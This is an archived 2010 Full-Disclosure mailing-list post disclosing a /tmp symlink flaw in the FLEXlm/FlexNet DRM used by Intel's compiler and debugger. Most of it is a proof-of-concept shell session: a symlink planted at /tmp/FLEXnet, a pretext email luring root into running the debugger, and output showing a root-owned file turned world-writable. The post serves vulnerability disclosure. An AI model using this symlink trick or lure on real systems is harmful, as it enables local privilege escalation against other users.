lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Wed, 21 Apr 2010 04:36:57 -0500
From: Marsh Ray <marsh@...endedsubset.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Old school bugs in Intel compiler and debugger
	FLEXlm FlexNet DRM


Full details at http://extendedsubset.com/?p=30

Here's an example strace:

mkdir("/tmp/FLEXnet", 0777) = -1 EEXIST (File exists)
chmod("/tmp/FLEXnet", 0777) = ...

I don't have the time to track down the full extent of it, but neither
do I think it should be neglected.

Possibly affects other stuff using this FLEXlm/FlexNet DRM solution.

Save yourselves! Hopefullly, you know who you are.

- Marsh

    /tmp$ ln -sf /tmp/couldve_bin_bash /tmp/FLEXnet

    /tmp$ ls -al /tmp
    total 616
    drwxrwxrwt 9 root root 4096 2010-04-20 23:22 .
    drwxr-xr-x 23 root root 4096 2009-08-05 07:00 ..
    -rw-r–r– 1 root root 0 2010-04-20 23:21 couldve_bin_bash
    lrwxrwxrwx 1 marsh marsh 21 2010-04-20 23:22 FLEXnet ->
/tmp/couldve_bin_bash
    drwx—— 2 root root 16384 2009-04-03 21:39 lost+found

    /tmp$ cat | mail root
    Dear root,
    I think there’s a bug in the Intel debugger. Could you please check
    to see what version we have installed. It should print it on startup.
    K thx bye
    ^D

    # . /opt/intel/Compiler/11.1/069/bin/iccvars.sh
    # idbc
    Intel(R) Debugger for applications running on Intel(R) 64, Version
11.1, Build [1.2097.2.333]
    (idb) q
    #

    /tmp$ ls -al /tmp
    total 616
    drwxrwxrwt 9 root root 4096 2010-04-20 23:22 .
    drwxr-xr-x 23 root root 4096 2009-08-05 07:00 ..
    -rwxrwxrwx 1 root root 0 2010-04-20 23:21 couldve_bin_bash
    lrwxrwxrwx 1 marsh marsh 21 2010-04-20 23:22 FLEXnet ->
/tmp/couldve_bin_bash
    drwx—— 2 root root 16384 2009-04-03 21:39 lost+found

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ